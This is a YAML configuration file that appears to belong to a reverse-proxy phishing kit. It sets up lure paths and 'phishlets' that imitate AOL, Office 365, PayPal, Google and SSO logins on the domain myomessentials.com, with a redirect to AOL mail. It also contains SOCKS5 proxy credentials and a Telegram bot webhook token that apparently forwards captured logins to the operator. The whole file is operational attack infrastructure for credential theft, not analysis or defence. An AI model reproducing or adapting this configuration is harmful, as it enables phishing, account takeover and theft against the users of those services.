blacklist_mode: unauth
ip: 64.227.11.55
lures:
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /VafsiZRE
      phishlet: aol
      redirect_url: ""
      template: download_example.html
      ua_filter: ""
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /BAJUTUeu
      phishlet: ssog
      redirect_url: ""
      template: ""
      ua_filter: ""
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /cFOEnUck
      phishlet: o365
      redirect_url: ""
      template: ""
      ua_filter: ""
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /pAgQXhmU
      phishlet: paypal
      redirect_url: ""
      template: ""
      ua_filter: ""
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /HPekUspO
      phishlet: aol
      redirect_url: ""
      template: ""
      ua_filter: ""
    - hostname: ""
      info: ""
      og_desc: ""
      og_image: ""
      og_title: ""
      og_url: ""
      path: /OxRIoyfg
      phishlet: google
      redirect_url: ""
      template: ""
      ua_filter: ""
proxy_address: 161.77.232.228
proxy_enabled: false
proxy_password: gpbq1lHZQl71WQv
proxy_port: 58369
proxy_session: false
proxy_type: socks5
proxy_username: Awo66AAkOlPC
redirect_key: sv
redirect_url: https://mail.aol.com
server: myomessentials.com
site_domains:
    aol: myomessentials.com
    god: localhost
    godaddy: localhost
    google: myomessentials.com
    icloud: google2.com
    o365: myomessentials.com
    paypal: myomessentials.com
    screenconnect: google2.com
    sso: localhost
    ssog: myomessentials.com
    stripe: localhost
    yahoo: localhost
sites_enabled:
    - o365
verification_key: af
verification_token: vd
webhook_telegram: 5450973986:AAGPYvdEkeJCqWwOxrRGy4XCdyhz7QXJEtQ/-1001530275751
webhook_verbosity: 1
